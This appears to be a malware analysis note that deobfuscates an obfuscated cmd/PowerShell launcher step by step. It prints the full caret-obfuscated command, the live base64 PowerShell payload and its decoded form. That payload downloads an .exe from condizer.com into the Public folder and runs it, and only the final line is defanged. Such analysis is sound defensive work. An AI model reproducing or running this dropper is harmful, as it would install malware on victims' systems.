SHA256 e1a68aaba205c7b7336d4f19627f54f891f5bc504372e575941d38cbcab42546
Original Command Line Arguments:
Cmd /v^:^O ^ ^ /r s^e^T ^ ^ UMn^l^=p^ow)r^sh)l^l^ -)^ ^:^ABoA^#4Ad^Q^A9^A^#4^A`Q^B^3AC^0^A^bwB^iA^#oA^`QB^j^A^gQA^IABO^A#U^A^dA
Au^AFcA^`^Q^Bi^A(^MAb^A^BpA#^U^Ab^$^B0ADsA^:^A^B^p^A#^$^A.A^A9^ACcA^a^AB0
^Ag^Q^AcAA6AC8^A^LwB^j^A^#8A^b$^Bn^A#n^A)$BlA^gIAL^$^B^j^A#^8^A^b^Q^Av^A^g
QAc^w^B0^AC^8A^aQBu^A#^QA^`Q^B4AC4^Ac^A^BoA^g^A^APw^B^s^AD0AcwBvA^#$A^
bwA1AC4Ad^ABrA#4^A:^w^AuA^FM^Ac^A^B^sA^#nAdAA^o^ACc^AQ^A^A+^ACnAO^w^A
n^A#nAd^A^B^F^ACA^APQ^A$^ACcA^\^w^A^4A^D(^A^:^wA7AC^QA^S^$^B^gAgU^A^P^Q
An^A#UAb^$B2A^D^oAcA^B,^A#I^Ab^A^Bp^A^#MAKw^A^+AF^w^A:wArAC^Q^A^aQ^B^0
^A(^UAKwA+AC4A^`Q^B^4A#U^A^:w^A^7A#Y^Abw^B^yA#^UAY^QBjA#$^AK^A^AnA^FQ
^AR^A^B^6ACA^A^a^QBuAC^A^A^:^A^Bp^A#$A.AApAgs^AdAByAgn^A)^w^An^A#^$^Ab$
^B^,^AC^4^AR^ABv^AgcAb^$^B^sA^#8A^YQBn^A(^Y^AaQ^Bs^A^#UA^K^AAn^A^FQ^AR^
A^B^6^AC^wA^I^AAnA(^oAR^wB^,ACn^AO^w^B^:^A#4Ad^$^Bv^A^#s^A`Q^A^tA(nAdAB^l
^A#^0A^IAAn^A(^oAR^w^B^,^AD^sAY$^By^A#U^AY^Q^Br^A^D^sA^f^QB^jA#(Ad^ABjA^#$^A)^w^B^9A^g0A^I^AA$AC^A^A^I^A^A$^ACA^AI^AA^$ACAA^I^AA^$^ACA
A^I^AA$^ACA^A^IAA$AA^=^=& sE^t ^ ^ Z^s^Lm=^!^UMn^l^:n=^k!& s^E^t ^ Rv^y=^!^Z^s^Lm:^g^=H^!& s^E^T ch^a^m=!Rv^y^:\=N^!& sE^T ^ ^dm=^!ch^a^m^:^$=^g^!&&S^e^T ^ ^ ^M^m^xs=^!^d^m:)=^e^!&&S^eT ^ ^ ^ H^J^o=^!^M^m^xs^:1=^z!& se^t ^ ^ ^q^zy=^!^H^J^o^::^=^J!&&s^et ^ ^x^e5C=!^q^zy:`^=^Z^!&& s^e^T ^ ^ ^ ^K^6^8=^!^x^e^5C^:^,^=^1!& se^t ^ ^ ^68V=!^K^6^8:^+^=n^!& se^T ^ q^F=!^6^8V^:(^=^E^!&& s^e^t ^ ^ ^8lW^m=^!q^F^:^.^=^W^!& S^ET E^3=^!^8^l^W^m:^#^=G^!&&ca^L^L %E^3%
Step 1. Remove Filler Noise character "^"
Cmd /v:O /r seT UMnl=pow)rsh)ll -) :ABoA#4AdQA9A#4A`QB3AC0AbwBiA#oA`QBjAgQAIABOA#UAdAAuAFcA`QBiA(MAbABp
A#UAb$B0ADsA:ABpA#$A.AA9ACcAaAB0AgQAcAA6AC8ALwBjA#8Ab$BnA#nA)$BlAgIAL
$BjA#8AbQAvAgQAcwB0AC8AaQBuA#QA`QB4AC4AcABoAgAAPwBsAD0AcwBvA#$AbwA
1AC4AdABrA#4A:wAuAFMAcABsA#nAdAAoACcAQAA+ACnAOwAnA#nAdABFACAAPQA$
ACcA\wA4AD(A:wA7ACQAS$BgAgUAPQAnA#UAb$B2ADoAcAB,A#IAbABpA#MAKwA+A
FwA:wArACQAaQB0A(UAKwA+AC4A`QB4A#UA:wA7A#YAbwByA#UAYQBjA#$AKAAnAF
QARAB6ACAAaQBuACAA:ABpA#$A.AApAgsAdAByAgnA)wAnA#$Ab$B,AC4ARABvAgcA
b$BsA#8AYQBnA(YAaQBsA#UAKAAnAFQARAB6ACwAIAAnA(oARwB,ACnAOwB:A#4Ad
$BvA#sA`QAtA(nAdABlA#0AIAAnA(oARwB,ADsAY$ByA#UAYQBrADsAfQBjA#(AdABjA#$A)wB9Ag0AIAA$ACAAIAA$ACAAIAA$ACAAIAA$ACAAIAA$ACAAIAA$AA==
& sEt ZsLm=!UMnl:n=k!& sEt Rvy=!ZsLm:g=H!& sET cham=!Rvy:\=N!& sET dm=!cham:$=g!&&SeT Mmxs=!dm:)=e!&&SeT HJo=!Mmxs:1=z!& set qzy=!HJo::=J!&&set xe5C=!qzy:`=Z!&& seT K68=!xe5C:,=1!& set 68V=!K68:+=n!& seT qF=!68V:(=E!&& set 8lWm=!qF:.=W!& SET E3=!8lWm:#=G!&&caLL %E3%
Step 2. Capture CMD line as it runs in Sandbox to get character substitutes
# = G
( and ) = E
` = Z
$ = g
n = k
powershell -e JABoAG4AdQA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEM
AbABpAGUAbgB0ADsAJABpAGgAWAA9ACcAaAB0AHQAcAA6AC8ALwBjAG8AbgBkAGk
AegBlAHIALgBjAG8AbQAvAHQAcwB0AC8AaQBuAGQAZQB4AC4AcABoAHAAPwBsAD0A
cwBvAGgAbwAzAC4AdABrAG4AJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAGkA
dABFACAAPQAgACcANwA4ADEAJwA7ACQASgBHAHUAPQAkAGUAbgB2ADoAcAB1AGI
AbABpAGMAKwAnAFwAJwArACQAaQB0AEUAKwAnAC4AZQB4AGUAJwA7AGYAbwByA
GUAYQBjAGgAKAAkAFQARAB6ACAAaQBuACAAJABpAGgAWAApAHsAdAByAHkAewAk
AGgAbgB1AC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAFQARAB6ACwAIAAk
AEoARwB1ACkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAEoARwB1ADsAYgByAG
UAYQBrADsAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACA
AIAAgACAAIAAgAA==
Step 3. Base64 Decode
$�h�n�u�=�n�e�w�-�o�b�j�e�c�t� �N�e�t�.�W�e�b�C�l�i�e�n�t�;�$�i�h�X�=�'�h�t�t�p�:�/�/�c�o�n�d�i�z�e�r�.�c�o�m�/�t�s�t�/�i�n�d�e�x�.�p�h�p�?�l�=�s�o�h�o�3�.�t�k�n�'�.�S�p�l�i�t�(�'
�@�'�)�;�$�i�t�E� �=� �'�7�8�1�'�;�$�J�G�u�=�$�e�n�v�:�p�u�b�l�i�c�+�'�\�'�+�$�i�t
�E�+�'�.�e�x�e�'�;�f�o�r�e�a�c�h�(�$�T�D�z� �i�n� �$�i�h�X�)�{�t�r�y�{�$�h�n�u�.�D�o�w�n�l�o�a�d�F�i�l�e�(�$
�T�D�z�,� �$�J�G�u�)�;�I�n�v�o�k�e�-�I�t�e�m� �$�J�G�u�;�b�r�e�a�k�;�}�c�a�t�c�h�{�}�}� � � � � � � � � � � � � � � � � �
Step 4 Remove spacer character "�"
(Decoded: $hnu=new-object Net.WebClient;$ihX='hxxp://condizer[.]com/tst/index.php?l=soho3.tkn'.Split('@');$itE = '781';$JGu=$env:public+'\'+$itE+'.exe';foreach($TDz in $ihX){try{$hnu.DownloadFile($TDz, $JGu);Invoke-Item $JGu;break;}catch{}} )